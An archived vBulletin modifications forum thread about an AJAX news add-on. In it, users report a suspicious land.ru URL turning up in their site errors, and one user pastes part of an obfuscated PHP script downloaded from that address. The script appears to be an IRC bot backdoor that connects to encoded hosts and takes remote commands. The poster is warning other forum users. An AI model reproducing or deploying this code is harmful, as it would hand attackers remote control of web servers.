The Arcive of Official vBulletin Modifications Site.

[AJAX] News/Announcements · **Released**: 04-08-2007

With this add-on you can quickly add new or announcements on your forum's index, forum display, or thread display. Each forum and thread can have their own unique message.

In the vBulletin options you can choose which user's can edit the text by entering their user ID into the box.
You can choose whether or not moderators can edit the message in the forums they moderate.
You can choose if you want the news/announcements to display on forum home, forum display, or thread display.

You can use bbcode and HTML but only if HTML tags have bbocde to convert to.
For example if you type <b></b> it'll convert to [b][/b].

Here are some screensohts
http://xenweb.net/images/ajaxnews/ajaxnews_1.png
http://xenweb.net/images/ajaxnews/ajaxnews_2.png

kylek · #82 01-02-2008, 05:29 PM

Now getting other script addresses in the database error:

http://www.xxxxx.xxx/forum/showthrea...ru/.html/body?

Same error different email in script:

http://www.xxxxxxx.xxx/forum/showthr.../.cache/index?

Uninstalling until this can be explained.

Ulf T · #83 01-03-2008, 10:35 PM

Quote:

Originally Posted by kylek

Still getting the same database error over and over, anyone else getting this?
Also what is the second address in the script? This - http://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body has nothing to do with our site.

I really don't know what it is. I just thought i would let you know i?ve also seen this address:

I haven?t installed this AJAX News hack, so i doubt that could have anything to do with it. But i maybe missunderstand you. Do you think the hack could be the reason why this strange url gives you database errors? Because i don?t get any database errors. I just see this address coming up in the activity list.

Ulf T · #84 01-04-2008, 09:43 AM

I tried the url, and downloaded the file "body". I have a mac, so i think it was fairly safe for me. I found a script inside it. It?s too obfuscated for me to find out what it?s doing. But i presume it?s something evil. Here is a part of the beginning:

Code:

<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0); error_reporting(0); ignore_user_abort();
$aec12e0af93cb5 = array ( "po" => 8080, "sp" => "uJijk4iVsIXRmQ==", "ch" => "aFaw", "ke" => "spd1iYSUqA==", "ha" => "dG1qQk1halK/nE6N", "pa" =>
"fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=", "tr" => "*", "mrnd" => 9, "mo" => "cqtrig==", "ve" => "dmFyWA==" ); function tc8a89c2c306fb($m341be97d9aff9) {
$m341be97d9aff9 = str_replace(" ", "", $m341be97d9aff9); return $m341be97d9aff9; } function ob5d21085bf2c0($m341be97d9aff9) { $m341be97d9aff9 =
base64_decode(tc8a89c2c306fb($m341be97d9aff9)); return $m341be97d9aff9; } function rfc35fdc70d5fc() { global $aec12e0af93cb5; $see11cbb19052e = array();
$td707b8140a662 = ""; $b59b514174bffe =
array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWVKHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo5eMipjHlm6RiZU=");
shuffle($b59b514174bffe); if(($j351a1d2ad68bc = fsockopen(jf9feaa9bcab30($b59b514174bffe[0]),$aec12e0af93cb5['po'],$k70106d0d82151,$d809b1abe3f111,15))) {
$m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); if (strlen($aec12e0af93cb5['sp'])>0) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UEFTUw==")."
".jf9feaa9bcab30($aec12e0af93cb5['sp'])); } q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("VVNFUg==")." ".gfb0daa8f01135($aec12e0af93cb5['mrnd'])." 127.0.0.1
localhost :$m8052146769b14"); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); while (!feof($j351a1d2ad68bc)) { $f7fabc1404929c
= trim(fgets($j351a1d2ad68bc,512)); $h6e2baaf3b97db = explode(" ",$f7fabc1404929c); if(($f7fabc1404929c == $td707b8140a662)) continue; if
(isset($h6e2baaf3b97db[0]) && $h6e2baaf3b97db[0] == ob5d21085bf2c0("UElORw==")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UE9ORw==")."
".$h6e2baaf3b97db[1]); } else if (isset($h6e2baaf3b97db[1]) && $h6e2baaf3b97db[1] == ob5d21085bf2c0("MDAx")) { q56eacb300613d($j351a1d2ad68bc,
ob5d21085bf2c0("TU9ERQ==")." $m8052146769b14 ".jf9feaa9bcab30($aec12e0af93cb5['mo'])); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("Sk9JTg==")."
".jf9feaa9bcab30($aec12e0af93cb5['ch'])." ".jf9feaa9bcab30($aec12e0af93cb5['ke'])); } else if(isset($zdfff0a7fa1a55[1]) && $zdfff0a7fa1a55[1] ==
ob5d21085bf2c0("NDMz")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); } else if (isset($h6e2baaf3b97db[1]) &&
isset($see11cbb19052e[$h6e2baaf3b97db[1]])) { unset($see11cbb19052e[$h6e2baaf3b97db[1]]); } else if (isset($h6e2baaf3b97db[1]) && ($h6e2baaf3b97db[1] ==
ob5d21085bf2c0("UFJJVk1TRw==") || $h6e2baaf3b97db[1] == "332")) { $n78e731027d8fd = strstr($f7fabc1404929c," :"); $n78e731027d8fd = substr($n78e731027d8fd,2);
$zdfff0a7fa1a55 = explode(" ",$n78e731027d8fd); $m67b3dba8bc677 = $h6e2baaf3b97db[0]; $v7c6483ddcd99e = explode("!",$m67b3dba8bc677); $v7c6483ddcd99e =
substr($v7c6483ddcd99e[0],1); $d73be252ca8221 = FALSE; if ($zdfff0a7fa1a55[0] == "\1".ob5d21085bf2c0("VkVSU0lPTg==")."\1") {

My guess is that they try to spread this link in order to trick people into downloading and executing this code.

VADOS · #85 01-05-2008, 06:49 AM

Unistalled.

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.05543 seconds Memory Usage 2,252KB Queries Executed 19 (?)
More Information
Template Usage: (1)SHOWTHREAD (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (1)ad_showthread_beforeqr (1)bbcode_code (1)bbcode_quote (1)footer (1)forumjump (1)forumrules (1)gobutton (1)header (1)headinclude (1)modsystem_post (1)navbar (6)navbar_link (120)option (1)pagenav (1)pagenav_curpage (2)pagenav_pagelink (5)post_thanks_box (5)post_thanks_button (1)post_thanks_javascript (1)post_thanks_navbar_search (5)post_thanks_postbit_info (4)postbit (5)postbit_onlinestatus (5)postbit_wrapper (1)spacer_close (1)spacer_open (1)tagbit_wrapper Phrase Groups Available: global inlinemod postbit posting reputationlevel showthread	Included Files: ./showthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/functions_bigthree.php ./includes/class_postbit.php ./includes/class_bbcode.php ./includes/functions_reputation.php ./includes/functions_post_thanks.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete showthread_start showthread_getinfo forumjump showthread_post_start showthread_query_postids showthread_query bbcode_fetch_tags bbcode_create showthread_postbit_create postbit_factory postbit_display_start post_thanks_function_post_thanks_off_start post_thanks_function_post_thanks_off_end post_thanks_function_fetch_thanks_start post_thanks_function_fetch_thanks_end post_thanks_function_thanked_already_start post_thanks_function_thanked_already_end fetch_musername postbit_imicons bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete postbit_display_complete post_thanks_function_can_thank_this_post_start pagenav_page pagenav_complete tag_fetchbit_complete forumrules navbits navbits_complete showthread_complete
Messages:

The Arcive of Official vBulletin Modifications Site.

It is not a VB3 engine, just a parsed copy!